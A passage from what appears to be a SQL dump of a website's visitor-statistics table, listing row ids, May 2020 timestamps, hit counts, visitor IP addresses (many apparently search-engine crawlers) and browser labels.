688881,8,8,0,0,'77.120.98.235','other'),(509311,1590689003,1,1,0,0,'130.180.210.203','chrome'),(509312,1590689100,1,1,0,0,'66.249.70.72','chrome'),(509313,1590689426,1,1,0,0,'51.77.52.160','chrome'),(509314,1590689478,1,1,0,0,'207.46.13.9','other'),(509315,1590689490,1,1,0,0,'8.29.198.26','other'),(509316,1590689699,1,1,0,0,'8.29.198.25','other'),(509317,1590691449,8,8,0,0,'77.120.98.235','other'),(509318,1590692677,1,1,0,0,'157.55.39.73','other'),(509319,1590692808,2,2,0,0,'207.46.13.83','other'),(509320,1590694032,1,1,0,0,'66.249.70.70','chrome'),(509321,1590694076,8,8,0,0,'77.120.98.235','other'),(509322,1590696543,8,8,0,0,'77.120.98.235','other'),(509323,1590696761,1,1,0,0,'66.249.70.70','chrome'),(509324,1590696775,1,1,0,0,'176.105.196.113','chrome'),(509325,1590697085,2,2,0,0,'66.249.70.69','chrome'),(509326,1590697606,1,0,1,0,'66.249.70.72',''),(509327,1590698242,1,1,0,0,'5.44.174.37','chrome'),(509328,1590698304,2,2,0,0,'66.249.70.70','chrome'),(509329,1590698339,1,1,0,0,'157.55.39.73','other'),(509330,1590698696,1,1,0,0,'66.249.70.72','chrome'),(509331,1590698711,1,1,0,0,'207.46.13.208','other'),(509332,1590698965,8,8,0,0,'77.120.98.235','other'),(509333,1590699134,1,1,0,0,'207.46.13.83','other'),(509334,1590699621,1,1,0,0,'65.154.226.109','chrome'),(509335,1590699761,1,1,0,0,'66.249.70.69','chrome'),(509336,1590700206,1,1,0,0,'207.46.13.83','other'),(509337,1590700323,1,1,0,0,'8.29.198.25','other'),(509338,1590700368,1,1,0,0,'207.46.13.15','other'),(509339,1590700533,1,1,0,0,'8.29.198.26','other'),(509340,1590701354,1,1,0,0,'66.249.70.69','chrome'),(509341,1590701397,8,8,0,0,'77.120.98.235','other'),(509342,1590702707,1,1,0,0,'207.46.13.15','other'),(509343,1590703302,1,1,0,0,'66.249.70.72','chrome'),(509344,1590703821,8,8,0,0,'77.120.98.235','other'),(509345,1590704045,1,1,0,0,'178.154.200.222','other'),(509346,1590705148,1,1,0,0,'207.46.13.15','other'),(509347,1590705881,1,1,0,0,'66.249.70.69','chrome'),(509348,1590706202,8,8,0,0,'77.120.98.235','other'),(509349,1590706316,1,1,0,0,'178.154.200.222','other'),(509350,1590706524,1,1,0,0,'66.249.70.70','chrome'),(509351,1590707060,1,1,0,0,'66.249.70.69','chrome'),(509352,1590707319,1,1,0,0,'66.249.70.72','chrome'),(509353,1590707667,1,1,0,0,'207.46.13.83','other'),(509354,1590707789,1,1,0,0,'195.181.166.152','firefox'),(509355,1590708603,8,8,0,0,'77.120.98.235','other'),(509356,1590709190,1,1,0,0,'66.249.70.70','chrome'),(509357,1590710170,1,1,0,0,'62.205.134.182','other'),(509358,1590710944,8,8,0,0,'77.120.98.235','other'),(509359,1590711061,1,1,0,0,'66.249.64.36','chrome'),(509360,1590711147,1,1,0,0,'66.249.70.69','chrome'),(509361,1590711157,2,2,0,0,'8.29.198.27','other'),(509362,1590711320,1,1,0,0,'66.249.70.70','chrome'),(509363,1590711325,1,1,0,0,'194.61.24.94','other'),(509364,1590711397,1,1,0,0,'66.249.70.72','chrome'),(509365,1590711430,1,1,0,0,'207.46.13.15','other'),(509366,1590712055,1,1,0,0,'213.180.203.146','other'),(509367,1590712352,1,1,0,0,'207.46.13.15','other'),(509368,1590712896,2,2,0,0,'66.249.70.70','chrome'),(509369,1590713041,1,1,0,0,'213.180.203.142','other'),(509370,1590713321,8,8,0,0,'77.120.98.235','other'),(509371,1590713366,2,2,0,0,'66.249.70.69','chrome'),(509372,1590714219,1,1,0,0,'178.154.200.196','other'),(509373,1590714395,1,1,0,0,'213.180.203.90','other'),(509374,1590715018,2,2,0,0,'207.46.13.15','other'),(509375,1590715635,8,8,0,0,'77.120.98.235','other'),(509376,1590716147,1,1,0,0,'34.222.173.159','other'),(509377,1590716947,1,1,0,0,'213.180.203.6','other'),(509378,1590717099,1,1,0,0,'66.249.70.70','chrome'),(509379,1590717690,1,1,0,0,'207.46.13.15','other'),(509380,1590717933,8,8,0,0,'77.120.98.235','other'),(509381,1590717943,1,1,0,0,'66.249.70.69','chrome'),(509382,1590717998,1,1,0,0,'128.124.14.111','chrome'),(509383,1590718282,1,1,0,0,'66.249.70.72','chrome'),(509384,1590718530,1,1,0,0,'178.154.200.220','other'),(509385,1590719596,2,2,0,0,'66.249.70.70','chrome'),(509386,1590719930,1,0,1,0,'66.249.70.69',''),(509387,1590720163,8,8,0,0,'77.120.98.235','other'),(509388,1590720263,1,1,0,0,'213.180.203.148','other'),(509389,1590720575,1,1,0,0,'178.154.200.196','other'),(509390,1590721257,1,1,0,0,'109.70.106.130','other'),(509391,1590721983,1,1,0,0,'8.29.198.26','other'),(509392,1590722188,1,1,0,0,'8.29.198.27','other'),(509393,1590722404,8,8,0,0,'77.120.98.235','other'),(509394,1590723281,1,1,0,0,'213.180.203.95','other'),(509395,1590723396,1,1,0,0,'213.180.203.109','other'),(509396,1590723578,1,1,0,0,'213.180.203.140','other'),(509397,1590723585,1,1,0,0,'66.249.70.70','chrome'),(509398,1590723643,1,1,0,0,'66.249.70.72','chrome'),(509399,1590724710,8,8,0,0,'77.120.98.235','other'),(509400,1590725034,1,1,0,0,'66.249.70.70','chrome'),(509401,1590725082,1,1,0,0,'178.154.200.222','other'),(509402,1590725286,1,1,0,0,'178.154.200.220','other'),(509403,1590725332,1,1,0,0,'66.249.70.72','chrome'),(509404,1590725917,1,1,0,0,'66.249.64.33','chrome'),(509405,1590725990,1,1,0,0,'213.180.203.16','other'),(509406,1590726110,1,1,0,0,'5.44.174.37','chrome'),(509407,1590726243,1,1,0,0,'66.249.70.70','chrome'),(509408,1590726653,1,1,0,0,'207.46.13.223','other'),(509409,1590727030,8,8,0,0,'77.120.98.235','other'),(509410,1590727277,1,1,0,0,'178.154.200.86','other'),(509411,1590727721,1,1,0,0,'207.46.13.223','other'),(509412,1590727897,1,1,0,0,'62.205.134.182','other'),(509413,1590729199,1,1,0,0,'66.249.70.70','chrome'),(509414,1590729366,8,8,0,0,'77.120.98.235','other'),(509415,1590729561,1,1,0,0,'178.154.200.222','other'),(509416,1590729955,1,1,0,0,'178.154.200.216','other'),(509417,1590730149,1,1,0,0,'213.180.203.95','other'),(509418,1590730561,1,1,0,0,'66.249.70.69','chrome'),(509419,1590731312,2,1,1,0,'66.249.70.72',''),(509420,1590731445,1,1,0,0,'193.218.118.131','chrome'),(509421,1590731457,1,1,0,0,'162.247.74.27','other'),(509422,1590731459,1,1,0,0,'162.247.74.27','chrome'),(509423,1590731659,8,8,0,0,'77.120.98.235','other'),(509424,1590732061,1,1,0,0,'178.154.200.155','other'),(509425,1590732807,1,1,0,0,'8.29.198.26','other'),(509426,1590732864,1,1,0,0,'66.249.64.36','chrome'),(509427,1590733018,1,1,0,0,'66.249.70.70','chrome'),(509428,1590733019,1,1,0,0,'8.29.198.27','other'),(509429,1590733082,2,2,0,0,'162.243.173.212','chrome'),(509430,1590733086,2,2,0,0,'112.213.89.109','chrome'),(509431,1590733101,1,1,0,0,'213.180.203.16','other'),(509432,1590733153,2,2,0,0,'103.90.203.217','chrome'),(509433,1590733537,1,1,0,0,'66.249.70.69','chrome'),(509434,1590733835,2,2,0,0,'46.211.18.73','chrome'),(509435,1590733984,8,8,0,0,'77.120.98.235','other'),(509436,1590734149,1,1,0,0,'81.169.144.135','chrome'),(509437,1590734436,1,1,0,0,'110.232.141.83','chrome'),(509438,1590734717,1,1,0,0,'131.153.37.2','chrome'),(509439,1590735185,1,1,0,0,'213.180.203.122','other'),(509440,1590735331,1,1,0,0,'66.249.70.69','chrome'),(509441,1590735561,1,1,0,0,'207.46.13.108','other'),(509442,1590735830,1,1,0,0,'66.249.70.72','chrome'),(509443,1590735856,1,1,0,0,'109.120.167.1','chrome'),(509444,1590735957,3,3,0,0,'154.81.86.238','chrome'),(509445,1590735988,3,3,0,0,'185.74.252.28','chrome'),(509446,1590736017,2,2,0,0,'104.37.84.4','chrome'),(509447,1590736266,8,8,0,0,'77.120.98.235','other'),(509448,1590736325,2,2,0,0,'213.232.126.114','chrome'),(509449,1590736781,1,1,0,0,'91.196.178.78','chrome'),(509450,1590736970,1,1,0,0,'83.24.97.143','chrome'),(509451,1590737331,1,1,0,0,'91.209.11.236','other'),(509452,1590737374,2,2,0,0,'31.185.107.245','chrome'),(509453,1590737455,1,1,0,0,'93.119.227.91','chrome'),(509456,1590737456,1,1,0,0,'69.4.87.74','other'),(509457,1590737488,1,1,0,0,'139.162.173.162','chrome'),(509458,1590737490,1,1,0,0,'172.104.20.59','chrome'),(509460,1590737493,1,1,0,0,'45.79.159.200','chrome'),(509461,1590737577,1,1,0,0,'81.88.49.52','chrome'),(509462,1590737626,1,1,0,0,'131.220.6.152','chrome'),(509463,1590738035,1,1,0,0,'195.16.79.216','chrome'),(509464,1590738295,1,1,0,0,'77.245.149.46','chrome'),(509465,1590738547,1,1,0,0,'207.46.13.108','other'),(509466,1590738562,8,8,0,0,'77.120.98.235','other'),(509467,1590738865,2,2,0,0,'103.227.176.15','chrome'),(509468,1590738869,1,1,0,0,'112.213.89.109','chrome'),(509469,1590738884,1,1,0,0,'178.154.200.222','other'),(509470,1590738959,2,2,0,0,'193.202.110.26','chrome'),(509471,1590739216,1,1,0,0,'212.26.142.26','chrome'),(509472,1590739230,1,1,0,0,'89.161.232.174','chrome'),(509473,1590739823,1,1,0,0,'213.180.203.16','other'),(509474,1590740372,2,2,0,0,'138.128.170.210','chrome'),(509475,1590740532,1,1,0,0,'198.245.49.176','chrome'),(509476,1590740571,2,2,0,0,'154.90.68.58','chrome'),(509477,1590740634,1,1,0,0,'178.154.200.220','other'),(509478,1590740655,1,1,0,0,'109.227.105.231','chrome'),(509479,1590740879,8,8,0,0,'77.120.98.235','other'),(509480,1590741039,1,1,0,0,'51.15.74.152','chrome'),(509481,1590741676,1,1,0,0,'207.46.13.38','other'),(509482,1590742274,1,1,0,0,'81.88.49.6','chrome'),(509483,1590742280,1,1,0,0,'81.88.49.28','chrome'),(509484,1590743152,2,2,0,0,'154.90.68.54','chrome'),(509485,1590743230,8,8,0,0,'77.120.98.235','other'),(509486,1590743276,1,1,0,0,'66.249.64.38','chrome'),(509487,1590743337,2,2,0,0,'51.15.72.153','chrome'),(509488,1590743381,2,2,0,0,'178.154.200.222','other'),(509489,1590743635,1,1,0,0,'8.29.198.27','other'),(509490,1590743850,1,1,0,0,'8.29.198.26','other'),(509491,1590744053,1,1,0,0,'66.249.70.70','chrome'),(509492,1590744086,1,1,0,0,'207.46.13.108','other'),(509493,1590744134,2,2,0,0,'213.180.203.16','other'),(509494,1590744349,1,1,0,0,'178.154.200.222','other'),(509495,1590744367,1,1,0,0,'156.230.20.152','chrome'),(509496,1590744392,1,1,0,0,'3.226.74.128','chrome'),(509497,1590744778,2,2,0,0,'62.233.120.26','chrome'),(509498,1590744904,2,2,0,0,'45.199.109.170','chrome'),(509499,1590745012,1,1,0,0,'66.249.70.70','chrome'),(509500,1590745095,1,1,0,0,'108.175.9.28','chrome'),(509501,1590745198,1,1,0,0,'207.46.13.38','other'),(509502,1590745739,8,8,0,0,'77.120.98.235','other'),(509503,1590746058,1,1,0,0,'193.202.110.26','chrome'),(509504,1590746173,1,1,0,0,'91.196.178.45','chrome'),(509505,1590746184,1,1,0,0,'107.165.35.82','chrome'),(509506,1590746185,1,1,0,0,'185.179.24.38','chrome'),(509507,1590746558,1,1,0,0,'66.249.70.70','chrome'),(509508,1590746904,2,2,0,0,'207.46.13.223','other'),(509509,1590746991,1,1,0,0,'188.163.19.57','firefox'),(509510,1590747144,3,3,0,0,'213.180.203.16','other'),(509511,1590747380,3,3,0,0,'154.90.68.54','chrome'),(509512,1590747690,1,1,0,0,'66.249.70.72','chrome'),(509513,1590747843,1,1,0,0,'66.249.70.70','chrome'),(509514,1590748085,8,8,0,0,'77.120.98.235','other'),(509515,1590748933,3,3,0,0,'207.46.13.223','other'),(509516,1590749252,2,2,0,0,'207.46.13.38','other'),(509517,1590749846,1,1,0,0,'178.154.200.222','other'),(509518,1590749921,1,1,0,0,'207.46.13.108','other'),(509519,1590749974,1,1,0,0,'109.74.154.72','chrome'),(509520,1590750395,8,8,0,0,'77.120.98.235','other'),(509521,1590750502,1,1,0,0,'66.249.70.69','chrome'),(509522,1590750525,1,1,0,0,'79.96.1.53','chrome'),(509523,1590750730,2,2,0,0,'154.94.92.30','chrome'),(509524,1590750816,2,2,0,0,'45.199.109.170','chrome'),(509525,1590750821,1,1,0,0,'81.88.49.28','chrome'),(509526,1590751182,1,1,0,0,'209.17.96.250','other'),(509527,1590751234,1,1,0,0,'207.46.13.108','other'),(509528,1590751342,2,2,0,0,'185.98.128.25','chrome'),(509529,1590752230,3,3,0,0,'154.90.68.54','chrome'),(509530,1590752296,1,1,0,0,'213.180.203.16','other'),(509531,1590752507,1,1,0,0,'178.154.200.196','other'),(509532,1590752570,1,1,0,0,'51.68.11.223','chrome'),(509533,1590752695,8,8,0,0,'77.120.98.235','other'),(509534,1590752896,1,1,0,0,'207.46.13.108','other'),(509535,1590753107,1,1,0,0,'178.154.200.220','other'),(509536,1590753463,1,1,0,0,'138.246.253.10','chrome'),(509537,1590753533,1,1,0,0,'178.154.200.106','other'),(509538,1590753602,1,1,0,0,'198.108.66.112','other'),(509539,1590753816,1,1,0,0,'178.154.200.245','other'),(509540,1590753823,3,3,0,0,'34.209.175.56','chrome'),(509541,1590754053,2,2,0,0,'66.249.70.70','chrome'),(509542,1590754094,1,1,0,0,'207.46.13.108','other'),(509543,1590754136,1,1,0,0,'198.108.66.32','other'),(509544,1590754347,2,2,0,0,'207.46.13.223','other'),(509545,1590754388,1,1,0,0,'157.55.39.56','other'),(509546,1590754462,1,1,0,0,'8.29.198.25','other'),(509547,1590754671,1,1,0,0,'8.29.198.27','other'),(509548,1590754954,1,1,0,0,'66.249.70.69','chrome'),(509549,1590755095,8,8,0,0,'77.120.98.235','other'),(509550,1590755379,1,1,0,0,'178.154.200.131','other'),(509551,1590755395,2,2,0,0,'66.249.70.70','chrome'),(509552,1590755672,1,1,0,0,'157.55.39.56','other'),(509553,1590755884,1,1,0,0,'91.196.178.82','chrome'),(509554,1590755991,1,1,0,0,'207.46.13.108','other'),(509555,1590756064,2,2,0,0,'198.38.82.252','chrome'),(509556,1590756125,1,1,0,0,'138.246.253.10','chrome'),(509557,1590756666,1,1,0,0,'213.180.203.16','other'),(509558,1590756705,1,1,0,0,'157.55.39.56','other'),(509559,1590756865,1,1,0,0,'45.199.109.170','chrome'),(509560,1590756896,1,1,0,0,'154.90.68.62','chrome'),(509561,1590756916,1,1,0,0,'88.155.198.145','chrome'),(509562,1590757103,1,1,0,0,'66.249.70.72','chrome'),(509563,1590757183,1,1,0,0,'131.153.37.2','chrome'),(509564,1590757375,8,8,0,0,'77.120.98.235','other'),(509565,1590757490,2,2,0,0,'207.46.13.108','other'),(509566,1590757572,1,1,0,0,'23.94.27.22','chrome'),(509567,1590758252,1,1,0,0,'207.46.13.223','other'),(509568,1590758329,1,1,0,0,'157.55.39.56','other'),(509569,1590758733,2,2,0,0,'138.128.170.210','chrome'),(509570,1590758737,2,2,0,0,'193.202.110.17','chrome'),(509571,1590758821,1,1,0,0,'45.199.109.170','chrome'),(509572,1590758871,2,2,0,0,'207.46.13.108','other'),(509573,1590759190,2,2,0,0,'108.175.9.28','chrome'),(509574,1590759243,1,1,0,0,'198.245.49.176','chrome'),(509575,1590759533,1,1,0,0,'157.55.39.56','other'),(509576,1590759618,4,4,0,0,'109.70.111.112','chrome'),(509577,1590759680,8,8,0,0,'77.120.98.235','other'),(509578,1590759986,2,1,1,0,'66.249.70.69',''),(509579,1590760596,1,1,0,0,'66.249.70.69','chrome'),(509580,1590760861,2,2,0,0,'154.90.68.150','chrome'),(509581,1590760989,1,1,0,0,'207.46.13.108','other'),(509582,1590761584,2,2,0,0,'178.154.200.222','other'),(509583,1590762020,8,8,0,0,'77.120.98.235','other'),(509584,1590762137,2,2,0,0,'154.94.92.166','chrome'),(509585,1590762157,1,1,0,0,'207.46.13.108','other'),(509586,1590762210,2,2,0,0,'45.199.109.122','chrome'),(509587,1590762225,2,2,0,0,'45.199.109.202','chrome'),(509588,1590762517,2,2,0,0,'213.180.203.16','other'),(509589,1590762633,1,1,0,0,'66.249.70.72','chrome'),(509590,1590764232,1,1,0,0,'207.46.13.223','other'),(509591,1590764346,2,2,0,0,'178.154.200.222','other'),(509592,1590764395,8,8,0,0,'77.120.98.235','other'),(509593,1590764437,2,2,0,0,'207.46.13.151','other'),(509594,1590764915,1,1,0,0,'66.249.64.36','chrome'),(509595,1590764991,1,1,0,0,'66.249.70.72','chrome'),(509596,1590765185,1,1,0,0,'207.46.13.181','other'),(509597,1590765266,1,1,0,0,'5.44.174.37','chrome'),(509598,1590765296,2,2,0,0,'8.29.198.25','other'),(509599,1590765409,1,1,0,0,'198.108.66.144','other'),(509600,1590765560,1,1,0,0,'207.46.13.151','other'),(509601,1590766156,1,1,0,0,'157.55.39.56','other'),(509602,1590766489,1,1,0,0,'213.180.203.16','other'),(509603,1590766679,8,8,0,0,'77.120.98.235','other'),(509604,1590767208,1,1,0,0,'66.249.70.72','chrome'),(509605,1590767475,1,1,0,0,'92.112.249.111','chrome'),(509606,1590768988,8,8,0,0,'77.120.98.235','other'),(509607,1590768992,1,1,0,0,'66.249.70.69','chrome'),(509608,1590769867,2,2,0,0,'178.154.200.222','other'),(509609,1590770203,1,1,0,0,'207.46.13.222','other'),(509610,1590770221,1,1,0,0,'66.249.70.72','chrome'),(509611,1590770666,1,1,0,0,'209.17.96.26','other'),(509612,1590770809,1,1,0,0,'178.154.200.222','other'),(509613,1590770914,1,1,0,0,'45.35.226.138','chrome'),(509614,1590770918,1,1,0,0,'154.90.68.54','chrome'),(509615,1590770937,1,1,0,0,'162.241.224.125','chrome'),(509616,1590771348,8,8,0,0,'77.120.98.235','other'),(509617,1590771364,2,2,0,0,'66.249.64.33','chrome'),(509618,1590771387,1,1,0,0,'154.85.189.222','chrome'),(509619,1590772106,2,2,0,0,'162.241.5.177','chrome'),(509620,1590772136,4,4,0,0,'185.74.252.28','chrome'),(509621,1590772248,2,2,0,0,'34.209.175.56','chrome'),(509622,1590772355,1,1,0,0,'186.64.117.235','chrome'),(509623,1590772621,1,1,0,0,'66.249.70.69','chrome'),(509624,1590772946,1,1,0,0,'66.249.70.70','chrome'),(509625,1590772956,1,1,0,0,'207.46.13.222','other'),(509626,1590773147,1,1,0,0,'213.180.203.16','other'),(509627,1590773271,1,1,0,0,'207.46.13.181','other'),(509628,1590773667,8,8,0,0,'77.120.98.235','other'),(509629,1590773852,2,2,0,0,'154.90.68.226','chrome'),(509630,1590773887,2,2,0,0,'207.46.13.51','other'),(509631,1590773918,2,2,0,0,'45.199.109.138','chrome'),(509632,1590774156,1,1,0,0,'207.46.13.222','other'),(509633,1590774664,1,1,0,0,'207.46.13.151','other'),(509634,1590774673,2,2,0,0,'66.249.70.69','chrome'),(509635,1590775057,2,2,0,0,'66.249.70.70','chrome'),(509636,1590775299,1,1,0,0,'207.46.13.51','other'),(509637,1590775559,7,7,0,0,'94.130.9.183','other'),(509638,1590775730,1,1,0,0,'207.46.13.181','other'),(509639,1590775768,1,1,0,0,'154.94.92.174','chrome'),(509640,1590776033,8,8,0,0,'77.120.98.235','other'),(509641,1590776040,1,1,0,0,'154.208.251.26','chrome'),(509642,1590776090,1,1,0,0,'178.154.200.222','other'),(509643,1590776126,1,1,0,0,'8.29.198.25','other'),(509644,1590776213,1,1,0,0,'207.46.13.222','other'),(509645,1590776334,4,4,0,0,'109.70.111.112','chrome'),(509646,1590776349,1,1,0,0,'8.29.198.27','other'),(509647,1590776414,1,1,0,0,'45.34.219.130','chrome'),(509648,1590776573,1,1,0,0,'66.249.64.33','chrome'),(509649,1590776995,1,1,0,0,'213.180.203.16','other'),(509650,1590777051,1,1,0,0,'207.46.13.151','other'),(509651,1590777055,3,3,0,0,'207.46.13.181','other'),(509652,1590777371,2,2,0,0,'154.90.68.62','chrome'),(509653,1590777405,2,2,0,0,'184.95.46.210','chrome'),(509654,1590777467,2,2,0,0,'154.94.92.30','chrome'),(509655,1590777496,2,2,0,0,'154.208.251.54','chrome'),(509656,1590777670,1,1,0,0,'132.148.29.143','chrome'),(509657,1590777768,1,1,0,0,'66.249.70.72','chrome'),(509658,1590777775,2,2,0,0,'66.249.70.70','chrome'),(509659,1590777911,2,2,0,0,'54.160.245.124','chrome'),(509660,1590778159,2,2,0,0,'66.249.70.69','chrome'),(509661,1590778361,8,8,0,0,'77.120.98.235','other'),(509662,1590778932,3,3,0,0,'154.90.100.246','chrome'),(509663,1590779248,1,1,0,0,'45.199.109.170','chrome'),(509664,1590779284,1,1,0,0,'207.46.13.181','other'),(509665,1590779393,3,3,0,0,'150.95.104.221','chrome'),(509666,1590779457,3,3,0,0,'178.154.200.222','other'),(509667,1590779541,1,1,0,0,'66.249.70.69','chrome'),(509668,1590779727,1,1,0,0,'66.249.64.33','chrome'),(509669,1590780018,2,2,0,0,'207.46.13.222','other'),(509670,1590780556,1,1,0,0,'154.94.92.30','chrome'),(509671,1590780674,1,1,0,0,'207.46.13.151','other'),(509672,1590780759,8,8,0,0,'77.120.98.235','other'),(509673,1590780760,1,1,0,0,'66.249.70.72','chrome'),(509674,1590780787,3,3,0,0,'154.90.68.62','chrome'),(509675,1590780822,1,1,0,0,'50.62.176.104','chrome'),(509676,1590780848,2,2,0,0,'45.199.109.126','chrome'),(509677,1590780932,1,1,0,0,'154.86.202.226','chrome'),(509678,1590780963,2,2,0,0,'45.199.109.206','chrome'),(509679,1590781075,1,1,0,0,'154.80.252.78','chrome'),(509680,1590781124,1,1,0,0,'66.249.70.69','chrome'),(509681,1590781158,1,1,0,0,'213.180.203.17','other'),(509682,1590781320,2,2,0,0,'154.90.68.58','chrome'),(509683,1590781700,1,1,0,0,'185.98.128.25','chrome'),(509684,1590782159,1,1,0,0,'207.46.13.51','other'),(509685,1590782241,1,1,0,0,'213.180.203.16','other'),(509686,1590782242,2,2,0,0,'66.249.70.70','chrome'),(509687,1590782285,1,1,0,0,'66.249.70.69','chrome'),(509688,1590782708,2,2,0,0,'154.86.202.226','chrome'),(509689,1590782727,1,1,0,0,'207.7.80.157','chrome'),(509690,1590782760,2,2,0,0,'67.229.78.210','chrome'),(509691,1590782777,1,1,0,0,'207.46.13.222','other'),(509692,1590782865,1,1,0,0,'154.85.189.222','chrome'),(509693,1590782922,1,1,0,0,'61.188.39.33','chrome'),(509694,1590783162,7,7,0,0,'77.120.98.235','other'),(509695,1590783237,1,1,0,0,'178.154.200.220','other'),(509696,1590784019,2,2,0,0,'154.90.68.62','chrome'),(509697,1590784225,3,3,0,0,'164.138.48.53','chrome'),(509698,1590784246,1,1,0,0,'154.90.68.150','chrome'),(509699,1590784257,1,1,0,0,'207.46.13.151','other'),(509700,1590784305,1,1,0,0,'103.90.203.217','chrome'),(509701,1590784323,2,2,0,0,'67.227.152.219','chrome'),(509702,1590784329,2,2,0,0,'112.213.89.109','chrome'),(509703,1590784358,1,1,0,0,'66.249.64.38','chrome'),(509704,1590784377,3,3,0,0,'66.249.70.69','chrome'),(509705,1590784549,2,2,0,0,'154.208.251.66','chrome'),(509706,1590784798,1,1,0,0,'118.123.20.122','chrome'),(509707,1590785034,1,1,0,0,'178.154.200.222','other'),(509708,1590785055,1,1,0,0,'94.124.1.224','chrome'),(509709,1590785164,1,1,0,0,'66.249.70.70','chrome'),(509710,1590785482,8,8,0,0,'77.120.98.235','other'),(509711,1590785812,1,1,0,0,'178.154.200.220','other'),(509712,1590785942,1,1,0,0,'207.46.13.151','other'),(509713,1590786378,1,1,0,0,'154.51.131.142','chrome'),(509714,1590786718,1,1,0,0,'66.249.70.70','chrome'),(509715,1590786952,1,1,0,0,'8.29.198.25','other'),(509716,1590787174,1,1,0,0,'8.29.198.27','other'),(509717,1590787265,1,1,0,0,'66.249.70.72','chrome'),(509718,1590787392,1,1,0,0,'213.180.203.16','other'),(509719,1590787639,1,1,0,0,'66.249.64.36','chrome'),(509720,1590787755,8,8,0,0,'77.120.98.235','other'),(509721,1590788535,1,1,0,0,'66.249.70.72','chrome'),(509722,1590788577,1,1,0,0,'66.249.70.70','chrome'),(509723,1590788693,1,1,0,0,'207.46.13.37','other'),(509724,1590789390,1,1,0,0,'157.55.39.240','other'),(509725,1590790042,8,8,0,0,'77.120.98.235','other'),(509726,1590790134,1,1,0,0,'78.106.122.233','chrome'),(509727,1590790589,3,3,0,0,'66.249.70.69','chrome'),(509728,1590790697,2,2,0,0,'207.46.13.151','other'),(509729,1590790760,1,0,1,0,'66.249.70.70',''),(509730,1590790814,1,1,0,0,'66.249.70.72','chrome'),(509731,1590791082,1,1,0,0,'194.61.24.94','other'),(509732,1590791524,3,3,0,0,'66.249.70.69','chrome'),(509733,1590791620,1,1,0,0,'66.249.64.38','chrome'),(509734,1590791678,1,1,0,0,'66.249.70.70','chrome'),(509735,1590791686,1,1,0,0,'207.46.13.222','other'),(509736,1590791860,1,1,0,0,'66.249.70.72','chrome'),(509737,1590792331,8,8,0,0,'77.120.98.235','other'),(509738,1590792541,1,1,0,0,'66.249.64.38','chrome'),(509739,1590792983,1,1,0,0,'66.249.70.69','chrome'),(509740,1590793108,1,1,0,0,'66.249.70.70','chrome'),(509741,1590793225,2,2,0,0,'207.46.13.151','other'),(509742,1590793252,2,2,0,0,'66.249.70.72','chrome'),(509743,1590793631,1,1,0,0,'157.55.39.240','other'),(509744,1590793885,2,2,0,0,'66.249.70.69','chrome'),(509745,1590794087,1,0,1,0,'66.249.70.70',''),(509746,1590794480,1,1,0,0,'66.249.64.36','chrome'),(509747,1590794603,8,8,0,0,'77.120.98.235','other'),(509748,1590795010,1,1,0,0,'66.249.70.72','chrome'),(509749,1590795028,1,1,0,0,'66.249.70.69','chrome'),(509750,1590795118,1,1,0,0,'207.46.13.151','other'),(509751,1590796040,1,1,0,0,'157.55.39.240','other'),(509752,1590796131,2,2,0,0,'66.249.70.70','chrome'),(509753,1590796269,1,1,0,0,'207.46.13.151','other'),(509754,1590796332,2,2,0,0,'66.249.70.72','chrome'),(509755,1590796351,4,4,0,0,'66.249.70.69','chrome'),(509756,1590796506,1,1,0,0,'62.205.134.182','other'),(509757,1590796928,8,8,0,0,'77.120.98.235','other'),(509758,1590797779,1,1,0,0,'8.29.198.27','other'),(509759,1590797945,1,1,0,0,'91.209.11.236','other'),(509760,1590798001,1,1,0,0,'8.29.198.25','other'),(509761,1590798022,1,1,0,0,'157.55.39.47','other'),(509762,1590798165,1,1,0,0,'66.249.64.33','chrome'),(509763,1590799048,2,2,0,0,'66.249.70.69','chrome'),(509764,1590799234,8,8,0,0,'77.120.98.235','other'),(509765,1590799250,1,1,0,0,'66.249.64.38','chrome'),(509766,1590800353,1,1,0,0,'66.249.70.69','chrome'),(509767,1590801341,2,1,1,0,'66.249.70.70',''),(509768,1590801504,1,1,0,0,'66.249.70.72','chrome'),(509769,1590801566,8,8,0,0,'77.120.98.235','other'),(509770,1590802358,3,2,1,0,'66.249.70.69',''),(509771,1590802415,2,2,0,0,'66.249.70.72','chrome'),(509772,1590802444,1,1,0,0,'157.55.39.47','other'),(509773,1590802673,1,1,0,0,'207.46.13.151','other'),(509774,1590802952,1,1,0,0,'66.249.70.70','chrome'),(509775,1590803828,8,8,0,0,'77.120.98.235','other'),(509776,1590803894,2,2,0,0,'66.249.70.70','chrome'),(509777,1590804376,1,1,0,0,'66.249.64.36','chrome'),(509778,1590804623,1,1,0,0,'66.249.70.69','chrome'),(509779,1590804748,1,1,0,0,'66.249.70.72','chrome'),(509780,1590806141,8,8,0,0,'77.120.98.235','other'),(509781,1590806975,1,1,0,0,'207.46.13.151','other'),(509782,1590807184,2,2,0,0,'54.242.190.115','chrome'),(509783,1590807472,1,1,0,0,'66.249.70.70','chrome'),(509784,1590807566,1,0,1,0,'66.249.70.69',''),(509785,1590808374,8,8,0,0,'77.120.98.235','other'),(509786,1590808440,1,1,0,0,'159.224.255.154','chrome'),(509787,1590808604,1,1,0,0,'8.29.198.27','other'),(509788,1590808828,1,1,0,0,'8.29.198.25','other'),(509789,1590808955,2,2,0,0,'66.249.70.69','chrome'),(509790,1590809080,1,1,0,0,'5.44.174.37','chrome'),(509791,1590809352,1,1,0,0,'157.55.39.240','other'),(509792,1590809800,1,1,0,0,'66.249.70.70','chrome'),(509793,1590810575,1,1,0,0,'54.36.149.106','other'),(509794,1590810585,8,8,0,0,'77.120.98.235','other'),(509795,1590810710,1,1,0,0,'157.55.39.240','other'),(509796,1590811415,1,1,0,0,'157.55.39.47','other'),(509797,1590811991,1,1,0,0,'91.196.178.174','chrome'),(509798,1590812241,1,1,0,0,'40.76.79.246','chrome'),(509799,1590812875,8,8,0,0,'77.120.98.235','other'),(509800,1590814174,1,1,0,0,'62.205.134.182','other'),(509801,1590814610,2,2,0,0,'207.46.13.110','other'),(509802,1590815151,8,8,0,0,'77.120.98.235','other'),(509803,1590816190,1,1,0,0,'66.249.70.72','chrome'),(509804,1590816247,1,1,0,0,'66.249.70.69','chrome'),(509805,1590817442,8,8,0,0,'77.120.98.235','other'),(509806,1590818407,1,0,1,0,'66.249.70.70',''),(509807,1590818790,2,2,0,0,'66.249.70.70','chrome'),(509808,1590819418,2,1,1,0,'66.249.70.72',''),(509809,1590819435,1,1,0,0,'8.29.198.26','other'),(509810,1590819662,1,1,0,0,'8.29.198.25','other'),(509811,1590819763,8,8,0,0,'77.120.98.235','other'),(509812,1590819915,1,0,1,0,'66.249.64.38',''),(509813,1590821314,1,1